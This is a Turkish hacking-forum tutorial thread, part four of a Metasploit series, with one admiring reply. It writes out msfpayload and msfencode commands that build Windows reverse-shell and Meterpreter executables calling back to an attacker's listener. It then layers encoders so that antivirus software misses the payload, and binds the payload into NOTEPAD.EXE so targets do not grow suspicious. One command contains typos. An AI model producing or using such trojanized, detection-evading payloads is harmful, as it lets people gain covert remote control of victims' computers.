Neler yeni

Kali Linux Metasploit #4 (1 Viewer)

  • Konbuyu başlatan JFO
  • Başlangıç tarihi
J

JFO

Sa İMT ailesi bugün metaploit serimizin 4 bölümündeyiz bu bölümde msfpayload,msfencode,msfvenom,msfcli bahsedicem biraz karışık konular bunlar
ama metasploitin olmassa olmazları diyebilirz hemen Konuya geçelim
Revealed content
MSFPAYLOAD NEDİR ?
Msfpayload metasploitte payload oluşturma işlemni yapan arkadaşımızdır php,exe,java,perl vb. dillerde payload oluşturabiliyoruz bu arkadaşla

MSFENCODE NEDİR ?
Günümüz Şartlarında Güvenlik Hat Safada Olduğu İçin Hazırladığımız payloadlar antivirüsler tarafından tesspit edilip siliniyo silinmemesi için msfencode kullanıcaz
aslında msfencode bi sike yaradağı yok msfencode ile kriptolanan payloadlar antivirsüler artık tanyo eskiden böyle bi durum yokdu eee o zman niye bunu anlatıyon amk diyebilirsiniz ama demeyin
çünkü bunada bi çar bulduk msfencode ile yetinmiyip farklı methodlar uygılayark antivirüsler tarafından tanınmaasını en aza indiricez
msfencode daha verimli olması için payload oluşturma aşamasında kullanılması daha iyi oluyo bazı sorunlar çıkıyo bunları engellemek için payload oluşturma sürecinde msfencodeyi kullanıcaz

MSFVENOM NEDİR ?
Msfvenom ise msfpayload ile msf encodein birleştirilmiş hali bu yüzden bunuda enlatmıyacam zaten tr de msfvenom anlatan bi kaç kaynak vardır


MSFCLİ NEDİR ?
Msfcli içinde metasploiti açamk zor gelenler için ufak tefek payloadlar falan var Üşenen Adam Zaten Bu işlerle uğraşmaz o yüzden anlatmıyacam

PAYLOAD OLUŞTURMAK
Kod:
msfpayload -h

bu komut ile parametleri ve oluşturcağım payloadun hangi dilde olucağını belilemk için parametreler var

örnek olarak e [X] e yazıyo exe şeklinde bi payload oluşturrken dosya tipini belirtmek için X yazıcaz

Kod:
msfpayload -l

Bu Komut İle payloadları görüntülüyoruz

sıra geldi payload hakkında bilgi almaya

Kod:
msfpayload (payload_ismi) 0

Örnek Olarak

msfpayload windows/shell_reverse_tcp 0

bu komut ile parametreleri görüntülüyoruz LHOST LPORT gibi

Sıra geldi payload oluşturmaya

Kod:
msfpayload (payload_isim) LHOST=İP LPORT=PORT x > /dizin/dosyadı.exe

örnek olarak

msfpayload windows/shell_reverse_tcp LHOST=192.168.5.107 LPORT=4444 x > /root/Desktop/shell.exe

Genel Olarak Payload Böyle Oluşuyo Başta Dediğim Gibi LPORT tan sonra yazdığımız X dosya tipini ifade ediyo buraya kadar herşey güzeldi burdan sonrası biraz karışık

NOT: Antivirüsler tarafından Tanınması en az olan dil pythondur

PAYLOAD OLUŞTURUP ENCODE ETMEK
Kod:
msfencode -h
Bu Komutu ile tüm parametreleri görebilirsiniz

Kod:
msfencode -l
Bu Komut ile encoder leri görüyoruz

şimdik payload la birlikte encode işlemine

Kod:
msfpayload  windows/meterpreter/reverse_tcp LHOST=192.168.2.107 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/call4_dword_xor -c 5 -t raw | msfencode -e x86/jmp_call_additive -c 3 -t raw | msfencode -e 3-t exe > /root/Desktop/multi.exe

İlk Bakışta Bune Amk Diyebilirsiniz Sakin Olun Şimdik Kodu Açalım Biraz msfpayloaddan normal bir payload şeçtik "|" ile ayırıp msfencode yazıp parametreli dolduruyoeuz "-e" ile şeçip "c" ile üzerine yazılacak süreyi şeçiyoruz Bu rakam ne kadar yüksek tutulursa encoder üzerinde o kadar kripto işlemi gerçekleştirilir fakat ne kadar çokkripto işlemi yaparsak o kadar dosya boyuru büyür ve hedef şüphelenme olaşılığı artar.Uzantı olark "-t" raw belirtiryoruz.Bu tür işlemlerde raw belirtmek en uygunudur bu şekilde istediğiniz kadar encoder yapabilirsiniz ama 4-5 geçmeyin geçdiğiniz zaman genllikle payload bozuluyo payload düzgün çalışmıyo

Eve böyle encode ederk antivirüsleri tanınma olasalığını azalltık ama yetermi yetmez
şimidk oluşturduğumuz payloadu hazı bi programla birleştircez notdefteri yani .txt , .jpg ,.mp3 formtalarla birleştirecez

Kod:
msfpayload winodws/meterpreter/reverse_tcp LHOST=192.168.2.103 LPOR=4444 R | msfencode -t exe -x /root/Desktop/NOTEPAD.EXE -k -o /root/Desktop/sonucmsf.exe -e x86/shikata_ga_nai -c 2

Bu Koduda Açıklıyalım payloadı şeçtik sonra msfencode "-e" encoder şeçtik birleştirceğimiz dosyayı "-x" olarak belirtiyoruz "-k" ile ekliyoruz sonra oluşturcak dosyanın yolunu belirtmek için "-o" ile yolu gösteriyoruz
bu şekilde payloadmız notepad ile birleştirip payloadımızn tanınmasını ve antivirüsler tarafından anlaşılmasını azaltıyoruz
evet arkadaşlar bu konuda bitmiştir şağlıcakla kalın
 
Moderatör tarafında düzenlendi:

Fexaius

ne adamsın yeaaa
kidemli152
Mesajlar
198
Credits
23
Sa İMT ailesi bugün metaploit serimizin 4 bölümündeyiz bu bölümde msfpayload,msfencode,msfvenom,msfcli bahsedicem biraz karışık konular bunlar
ama metasploitin olmassa olmazları diyebilirz hemen Konuya geçelim
[Hidden content]
Muhtişim bir konu olmuş eline sağlık...
 
  • Like
Tepkiler: JFO

Bu konuyu görüntüleyen kullanıcılar